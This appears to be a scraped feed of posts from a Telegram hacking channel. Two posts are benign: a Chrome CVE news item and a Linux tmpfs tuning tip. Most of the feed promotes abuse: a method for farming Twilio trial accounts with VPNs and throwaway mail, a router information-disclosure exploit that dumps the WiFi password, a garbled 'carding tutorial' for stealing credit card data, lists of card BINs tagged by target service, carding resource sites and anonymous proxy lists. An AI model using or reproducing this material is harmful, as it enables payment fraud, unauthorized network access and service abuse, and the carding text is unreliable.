UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.3K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Hacker News by Undercode - google bugs last
recently from twitter.com/undercodeNews :

Google releases Chrome emergency patch to fix CVE-2020-6457 critical vulnerability :

> Google has released an emergency fix for the Chrome browser and urges users to install it as soon as possible. Google did not disclose more information about the CVE-2020-6457 vulnerability, but only confirmed it as a "use after free" type vulnerability.

> The vulnerability was discovered by Sophos security researchers and is said to be a remote code execution (RCE) vulnerability. The vulnerability allows an attacker to run commands and untrusted scripts without the victim ’s knowledge.

> Security researcher Paul Ducklin said in a blog post that the vulnerability will allow hackers to β€œchange the control flow inside your program, including transferring the CPU to run untrusted code that the attacker just poke into memory from outside, thus bypassing any browser The usual security check or 'Are you sure' dialog. "

> In addition, he also said that the vulnerability has a wide range of impacts, including up to 2 billion users of Windows, macOS and GNU / Linux users may be affected. So after most users have installed the update, Google may announce more details.

> If you are a Google Chrome browser user, then you should make sure you are running v81.0.4044.113 or above. You can check the updated and installed version by visiting the help about Google Chrome browser.

WRITTEN BY UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ After this new google Cve 100 reasons to use firefox for access google.com :(
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ unlimited phone numbers How to Work with your Free Twilio Trial Account by Undercode :
t.me/UndercodeTesting

πŸ¦‘ 𝕃𝔼𝕋 π•Š π•Šπ•‹π”Έβ„π•‹ :

1) use nordvpn or any openvpn and adjust to usa ip
(random)

2) Sign up for your Free Twilio Trial
Head on over to https://www.twilio.com/try-twilio to sign up for your free trial account. Part of the signup process includes verifying your personal phone number: this is a security measure that is mandatory before you can try Twilio.

3) Once you finish signup, you should see your Console Dashboard. This is your home for finding your Twilio credentials, checking your usage, procuring a phone number and more.

4) give you a small preloaded balance to test out Twilio’s functionality. You will not be charged for Twilio phone numbers or usage until you upgrade.

5) then go to https://protonvpn.com/

πŸ¦‘Verify your Personal Phone Number

6) When you signed up for your trial account, you verified your personal phone number. You can see your list of verified phone numbers on the Verified Caller IDs page.

7) You must verify any non-Twilio phone numbers you wish to send SMSes, MMSes, or place phone calls to while in trial mode. This is an extra security measure for trial accounts that we remove once you upgrade your account. You may verify as many phone numbers as you’d like.

> use textnow or textplus or any usa number posted on UndercodeTesting telegram

8) To make other non-Twilio phone numbers available to you in trial mode:

> Go to your Verified Caller IDs page in the console.

> Find phone numbers dashboard

> Find verified caller IDs in the console

> Click on the red plus (+) icon to add a new number.

9) Add a new verified caller ID

10) Enter the phone number you wish to call or text from Twilio. .

11) Verify a new phone number with Twilio

12) Enter the verification code. You’re now ready to text or call this number with your trial Twilio account.
Complete your phone number verification

13) clearn history and web cache data, the go to proton or some tempory mail services and again create account and new free number :)

E N J O Y
written by Undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ How speed up linux server by Undercode :
pinterest.com/undercode_Testing

πŸ¦‘ 𝕃𝔼𝕋 π•Š π•Šπ•‹π”Έβ„π•‹ :

> The default system will load / dev / shm, which is the so-called tmpfs, some people say that it is different from ramdisk (virtual disk). Like a virtual disk, tmpfs can use your RAM, but it can also use your swap partition for storage. And the traditional virtual disk is a block device, and requires a command like mkfs to really use it. Tmpfs is a file system, not a block device; you just install it and it can be used.
tmpfs has the following advantages:

1) The size of the dynamic file system;

2) Another major benefit of tmpfs is its lightning speed. Because the typical tmpfs file system resides entirely in RAM, reading and writing can be almost instantaneous;

3) tmpfs data will not be retained after restarting, because virtual memory is inherently volatile. So it is necessary to make some scripts to do operations such as loading and binding.

Ok, let ’s talk about some basic principles. Let ’s get bored, let ’s talk about my application :)
First, create a tmp folder in / dev / shm, and then bind it with the actual / tmp:
mkdir / dev / shm / tmp
chmod 1777 / dev / shm / tmp
mount --bind / dev / shm / tmp / tmp
application example: 1. squid cache directory setting
vi /etc/squid/squid.conf
Modify to
cache_dir ufs / tmp 256 16 256

πŸ¦‘ The first 256 here( to slow as example by undercode to make it more faster ) means use memory, I think the method of using ramdisk not as good Use tmpfs directly, at least not use mkfs every time you start, you can also dynamically change the size. At this time, / tmp is actually dev / shm / tmp.
Then restart the service, ok, now all Squid cache files are saved in the tmpfs file system, soon.

4) Optimization of php performance
For a website with a lot of apache + php access, there may be a lot of temporary files under tmp, such as seesion or some cache files, then you can save it to tmpfs file.
The way to save the seesion is very simple. Just modify php.ini. Since I have bound / dev / stm / tmp and / tmp, I do n’t need to rewrite it. As for the cache file generated by the php program, I can only change myself. Php program :

E N J O Y
written by Undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ 2020 wifi exploit code tested for EDIMAX Routers :
# Tested on: Edimax EW-7438RPn 1.13 Version


πŸ¦‘ Here step by step :

1) I did Setup
2) After setup try to access to *wlencrypt_wiz.asp* file
3) After access to this file, I saw some information disclosure
(Like *WiFi Password*)
4) Here is the all leak here:

-------------------------------

<SCRIPT>
var _DATE_="Mon Sep 24 19:38:17 CST 2012";
var _VERSION_="1.13";
var _MODEL_="EW7438RPN";
var _MODE_="Edimax";
var _PLATFORM_="RTL8196CS_1200";
var _HW_LED_WPS_="4";
var _HW_LED_POWER_="6";
var _HW_LED_WIRELESS_="2";
var _HW_BUTTON_RESET_="5";
var _HW_BUTTON_WPS_="1";
var _HW_BUTTON_SWITCH_="3";
var _HW_LED_USB_="17";
var _WIRELESS_IGMPSNOOP_="y";
var _SPECIAL_CHAR_FILTER_IN_SCRIPT_="y";
var _RDISC_="y";
var _WPS_NO_BROADCAST_="y";
var _UPNP_LIB_VERSION2_="y";
var _WDS_UR_INFO_="y";
var _RESERVE_ENCRYPTION_SETTING_="y";
var _IGMP_PROXY_="y";
var _IGMPSNOOP_="y";
var _RFTYPE_="2T2R";
var _MEMBUS_="16";
var _MEMSIZE_="16";
var _MEMTYPE_="SDRAM";
var _FLASHTYPE_="SPI";
var _REMOVE_RADIUS_SERVER_="y";
var _AUTO_CHANNEL_DET_="y";
var _CONTROL_SIDEBAND_="y";
var _WIFI_11N_STANDARD_="y";
var _SETTING_WIZARD_="y";
var _CONFIG_FILE_NAME_="7438RPN";
var _AP_WITH_DNS_="y";
var _USE_DNRD_="y";
var _WPS_MIX_="y";
var _POWER_SAVING_="y";
var _WEB_FILE_NAME_="7438RPN";
var _PINCODE_BY_MAC_="y";
var _UPNP_RESPONDER_="y";
var _MDNS_RESPONDER_="y";
var _NETBIOS_RESPONDER_="y";
var _AP_WITH_DHCP_CLIENT_="y";
var _LLTD_NODENAME_="y";
var _DHCP_SWITCH_="y";
var _CONNECT_TEST_="y";
var _START_BOA_="y";
var _WPS_Daemon_="y";

var security = 1;
apMode = 6;
methodVal = 2;
opMode = 0;
apMachType = 1;

var ssidTbl = new Array("PentesterTraining");
var mirrorTbl = "";
var secModeTbl = new Array("2");
var enable1XTbl = new Array("0");
var _1xMode = "0";
var wepTbl = new Array("0");
var keyTypeTbl = new Array("1");
var wpaCipherTbl = new Array("2");
var pskFormatTbl = new Array("0");
var pskValueTbl = new Array("wifipass123.");
var defaultKeyIdTbl=new Array("0");
var rsIp= "";
var rsPort= "1812";
var rsPassword= "";


E N J O Y

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ more leaked cve for later :)
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Carding tutorial-crack credit card number CVV (Credit card number, CVV)
t.me/undercodeTesting

πŸ¦‘ 𝕃𝔼𝕋 π•Š π•Šπ•‹π”Έβ„π•‹ :

> Hack valid credit card number and their CVV number!!!!!!!!!!!!!!!!!!!! Scientific American (http://www.sciam.com/) has published an article called "how to steal millions of money", this is for the use of stolen credit CARDS over the Internet. Original articles still can check it on the website:

> http://www.efc.ca/pages/media/scien... The an. 01 aug19. HTML before you go to shopping on the Internet, every customer has with his/her credit card online registration information and they leave their email let those shopping website will also confirm the registration. For those who use yahoo! Mail online shoppers, their credit card information is stored in the yahoo server automatically, these companies send their confirmation email. However, in these people's credit card information any who have valid credit card a random email users retrieve server a serious mistake.

> In order to simplify this, here's how it works: send email to confuse mailbot yahoo server, so that it will return to your email address and complete the information stored on the server in the last 72 hours of credit card information.

> This is how you will make people's credit card information effectively. Now, you need to do exactly the same as the following: send mail to mailerdaemon_serverbot@yahoo.com theme: accntopp - CC - E52488 confused (server) in the email body, wrote: "border =" 0-86226711-106343 "(this is line 1) the content-type: text/plain; (line 3) is this the charset = US - ASCII (this is line 4, make the returned email read) credit card number (this is the no. 7 line, must be lowercase) 000 trillion (this is the line 8, put a zero each character, Numbers, letters, hyphens, and so on) name card (this is the line 11, must be lowercase)

> 0000000000000000 (this is the 12th line, put a minus each character, Numbers, letters, hyphens, etc.), CID/cvc2 / CVV2 number that can be a three digits, or in the back of the card or positive 4. It depends on the Type of credit card you use (this is the line 15, must be lowercase).
0000000000000 (this is the line 16, the zero each character, Numbers, letters, hyphens, and so on) address, city (this is 19 lines, must be lowercase) 0000000000 (this is 20 lines, the zero each character, Numbers, letters, hyphens, and so on) of the state, country, post office box under (23, this is must be lowercase) 00 quadrillion (this is the line 24, the zero each character, Numbers, letters, hyphens, etc.) under the type of card (this is the line 27, must be lowercase) 0000000000 (this is the line 28, put a zero each character, Numbers, letters, hyphens, and so on) due date (this is line 31, must be lowercase), 0000000000000 (32, this is offline to zero each character, Numbers, letters, hyphens, etc.)

> in the phone number (this is the line 35, must be lowercase), 0000000000000 (this is the line 36, minus each character, Numbers, letters, hyphens, and so on) of the social security number (this is the 39th line, must be lowercase) 0000000000000 (this is 40, the zero each character, Numbers, letters, hyphens, etc.) bank issuer name (this is 43 line, must be lowercase), 0000000000000 (this is the line 44, put a zero each character, Numbers, letters, hyphens
, etc.) email (this is offline 47, must be lowercase), 0000000000000 (this is the line 48, the zero each character, Numbers, letters, hyphens, etc.) under 252 ads < m > (this is the line 51) return path: < your E-mail Here > (this is 54 line in with your email type < >) S_ you need to make sure you do exactly the same thing and it says 0000 more than the credit card information is completely correct/valid. Effectively,
> this means that a is a major credit card registered in your database. Below is a sample email: (note that this is the only example, the card is invalid, let the whole thing work, you must use a valid credit card as bait to:! mailerdaemon_serverbot@yahoo.com theme: accntopp - CC - E52488 email text: border = '0-86226711-106343 "the content-type: text/plain; charset = US - ASCII Jessie e bank 00000000000 523 000 2537 0000000000000000 4013993145565451 stilwell, des moines IA 00000000000000000000000, USA, 50567, 0000000000 visa 0000 03/2004 0000000 00000000000 00000000000 555-555-5555 00000000000 0000000000 00000000 citigroup jessedbanks@yahoo.com 000000000000000000000 252 ads < m > to return path



@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ Carding tutorial-crack credit card number CVV (Credit card number, CVV) posted to secure your cc not steal !
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘2020 TESTED BINS @UNDERCODETESTING


NETFLIX

BINS :
379211xxxxx100x
379742xxxxx100x
379468xxxxx100x
379623xxxxx100x
379463xxxxx100x
379466xxxxx100x
379402xxxxx100x
379741xxxxx100x

IP : USA

DATE : RND

CVV : RND

OLD BIN : 5579209098xxxxxx

IP : MEXICO

DATE : 03/22 OR RND

CCV : 115 OR RND

--------------------------------------

πŸ¦‘FACEBOOK ADS

IP : USA

BIN : 5376664xxx606xx0

DATE : RND

CVV : RND

ZIP CODE : 10005 OR 10010

PUBLISHER TEL ID : 672653579

--------------------------------------

πŸ¦‘AWS

IP : ANY

BIN : 552490000409xxxx

DATE : 09/21 OR RND

CVV : RND

PUBLISHER TEL ID : 75983712

--------------------------------------

πŸ¦‘SPOTIFY

IP : TUNISIA

BIN : 4152853633608xxx

DATE : 01/22 OR RND

CVV : RND

PUBLISHER TEL ID : 878672562

--------------------------------------

πŸ¦‘WISH | APP STORE

OLD BIN : 491573700002xxxx

IP : MEXICO

DATE : 02/ 21 OR RND

CVV : 023 OR RND

--------------------------------------

πŸ¦‘BOOK DEPOSITORY

BIN : 47721330235xxxxx

IP : USA

DATE : 05/22 OR RND

CVV : 092 OR RND

--------------------------------------

πŸ¦‘PAYPAL

IP : USA

BINS:
379221xxxxx100x
379219xxxxx100x
379288xxxxx100x
3792877xxxx100x
379217xxxxx100x
379286xxxxx100x
379235xxxxx100x
379269xxxxx100x
379289xxxxx100x
379217xxxxx100x
379287xxxxx100x
379285xxxxx100x
379283xxxxx100x
379284xxxxx100x
379216xxxxx100x
379218xxxxx100x
379247xxxxx100x

DATE : RND

CVV : RND

--------------------------------------

πŸ¦‘ZAZZLE

IP : MEXICO

BIN : 477213302357xxxx

DATE : 05/22 OR RND

CVV : 092 OR RND

--------------------------------------

PLAYSTORE

IP : USA

BIN : 5496278055xxxxxx

DATE : 06/23 OR RND

CVV : RND


ZIP CODE : 10010 OR 10080



▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ USEFULL SITES FOR CARDING
T.me/undercodeTesting

> Temporary mail:
https://tempail.com
https://www.mohmal.com
https://temp-mail.org

> Notepad:
https://ghostbin.com
https://hastebin.com
https://pastebin.com
https://hatebin.com

> Generate personal data:
www.fakenamegenerator.com
www.datafakegenerator.com
https://randomuser.me
http://4devs.com.br

> Number of virtual phones:
https://smsreceivefree.com
https://tempophone.com

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘FRESH PREMIUM PROXIES :


37.120.192.154:8080 anonymous Apr-22, 12:38 Netherlands Amsterdam Secure Data Sys...
103.28.121.58:80 anonymous Apr-21, 21:32 Bangladesh University Gran...
51.158.180.150:8811 anonymous Apr-21, 20:53 France Paris Department for ...
200.54.108.54:80 anonymous Apr-21, 21:52 Chile Santiago Ctc. Corp S.A. ...
196.223.162.226:80 anonymous Apr-22, 01:16 Kenya Nairobi
150.242.182.98:80 anonymous Apr-21, 22:00 Malaysia GITN Sdn. Bhd.
82.81.169.142:80 anonymous Apr-21, 21:54 Israel Tel Mond Bezeq Internati...
188.166.2.49:1081 anonymous Apr-22, 01:22 Netherlands Amsterdam DigitalOcean
163.19.235.22:80 anonymous Apr-21, 22:23 Taiwan Hsinchu MOEC
196.192.74.38:80 anonymous Apr-22, 04:11 Tanzania, United Republic of Tanzania-e-Gove...
77.28.96.206:56644 elite Apr-21, 19:02 Macedonia Skopje Makedonski Tele...
41.77.23.221:41049 elite Apr-22, 13:13 Madagascar Airtel Madagascar
41.190.95.20:56167 elite Apr-22, 01:11 Malawi Lilongwe SKYBAND
41.87.29.130:8080 elite Apr-22, 01:22 Malawi Malawi Telecomm...
41.75.123.49:41263 elite Apr-22, 09:30 Malawi SKYBAND
94.242.213.96:8118 elite Apr-21, 22:10 Luxembourg root SA
94.242.213.33:8118 elite Apr-21, 22:10 Luxembourg root SA
89.111.33.164:3128 elite Apr-22, 15:40 Latvia Riga SIA Digitalas E...
109.75.67.59:44151 elite Apr-22, 00:51 Lebanon Nabatieh Lebanon Online ...
109.75.67.144:44151 elite Apr-22, 15:12 Lebanon Nabatieh Lebanon Online ...
109.75.67.143:44151 elite Apr-21, 21:28 Lebanon Nabatieh Lebanon Online ...
154.66.110.90:57393 elite Apr-22, 00:05 Lesotho Maseru Comnet Pty Ltd
154.73.109.84:53281 elite Apr-22, 12:11 Libyan Arab Jamahiriya Trans-sahara
154.73.109.145:53281 elite Apr-22, 03:29 Libyan Arab Jamahiriya Trans-sahara
41.254.44.229:53283 elite Apr-21, 19:12 Libyan Arab Jamahiriya Libyan Telecom ...
78.60.203.75:40494 elite Apr-21, 20:06 Lithuania Vilnius TEO LT
94.232.126.225:48235 elite Apr-22, 07:19 Lithuania Kaunas UAB Airnet
82.135.148.201:8081 elite Apr-22, 03:06 Lithuania TEO LT
81.198.119.241:50835 elite Apr-22, 03:16 Latvia Riga SIA Lattelecom
41.217.217.60:36120 elite Apr-22, 16:09 Malawi Skyband Corpora...
202.131.234.142:51702 elite Apr-21, 22:18 Mongolia Mobinet LLC
202.179.7.158:23500 elite Apr-21, 22:14 Mongolia Mongolia Telecom
41.223.155.118:53281 elite Apr-22, 16:13 Mozambique Maputo Moztel LDA
103.81.114.182:53281 elite Apr-22, 12:15 Myanmar Yangon
139.5.71.46:23500 elite Apr-21, 19:05 Nepal WorldLink Commu...
139.5.71.80:23500 elite Apr-22, 03:13 Nepal WorldLink Commu...

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
45.76.43.163:8080 elite Apr-22, 16:42 Netherlands Amsterdam Choopa, LLC
5.2.72.101:3128 elite Apr-22, 00:27 Netherlands Liteserver VOF
202.179.7.182:56506 elite Apr-21, 18:09 Mongolia Mongolia Telecom
202.179.21.49:23500 elite Apr-22, 13:13 Mongolia Ulan Bator Mongolia Telecom
93.116.185.57:36471 elite Apr-22, 01:26 Moldova, Republic of Chisinau IPv4 Management...
175.139.179.65:39138 elite Apr-21, 19:44 Malaysia Petaling Jaya Telekom Malaysia
210.48.204.134:46669 elite Apr-22, 15:33 Malaysia DiGi Telecommun...
1.32.59.217:46162 elite Apr-21, 21:13 Malaysia Petaling Jaya TM Net
217.64.109.231:45282 elite Apr-21, 18:47 Mali Bamako SOTELMA
197.155.158.22:80 elite Apr-21, 22:07 Mali Orange Mali SA
195.158.109.248:50330 elite Apr-21, 22:07 Malta Valletta GO P.L.C.
41.190.147.158:40218 elite Apr-22, 06:54 Mauritius Infocom Limited
143.255.40.106:45572 elite Apr-21, 21:09 Mexico Mexico City SMARTNETT CARRI...
178.17.170.124:80 elite Apr-22, 04:13 Moldova, Republic of Chisinau I.C.S. Trabia-N...
41.217.219.49:49072 elite Apr-21, 19:40 Malawi Skyband Corpora...
190.149.212.170:58043 elite Apr-22, 01:25 Guatemala Guatemala City Telgua
36.92.178.100:55443 elite Apr-21, 19:39 Indonesia Manado PT Telkom Indon...
94.182.226.74:53281 elite Apr-22, 06:10 Iran, Islamic Republic of Aria Shatel Com...
5.202.181.163:8080 elite Apr-22, 01:07 Iran, Islamic Republic of Pishgaman Tosee...
217.219.31.210:44791 elite Apr-21, 22:02 Iran, Islamic Republic of Information Tec...
185.23.128.180:3128 elite Apr-22, 04:32 Iran, Islamic Republic of Razavi Informat...
62.201.220.50:43031 elite Apr-21, 18:59 Iraq IQ Networks
212.126.102.142:58695 elite Apr-21, 19:58 Iraq Sulaymaniyah AL-SARD FIBER C...
52.31.193.74:8118 elite Apr-21, 22:13 Ireland Dublin Amazon Technolo...
52.16.71.254:80 elite Apr-22, 01:25 Ireland Dublin Amazon Technolo...
103.209.176.159:40154 elite Apr-21, 19:49 India Dhamtari Priya Agency
213.16.81.189:54040 elite Apr-22, 13:03 Hungary Taktaszada Invitel Tavkozl...
85.159.48.170:40014 elite Apr-22, 16:10 Hungary Com.unique Tele...
102.176.160.75:41701 elite Apr-22, 04:22 Guinea
160.119.131.114:43675 elite Apr-22, 04:03 Guinea
160.119.128.202:8080 elite Apr-22, 06:44 Guinea
168.228.192.13:55619 elite Apr-22, 06:07 Honduras San Pedro Sula Multicable De H...
190.6.200.158:38256 elite Apr-22, 07:02 Honduras San Pedro Sula Sulanet SA / In...
23.101.2.247:81 elite Apr-22, 04:04 Hong Kong Central Microsoft Corpo...
159.138.5.222:80 elite Apr-21, 18:48 Singapore Rouge Steel Co.
Select All Proxies

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁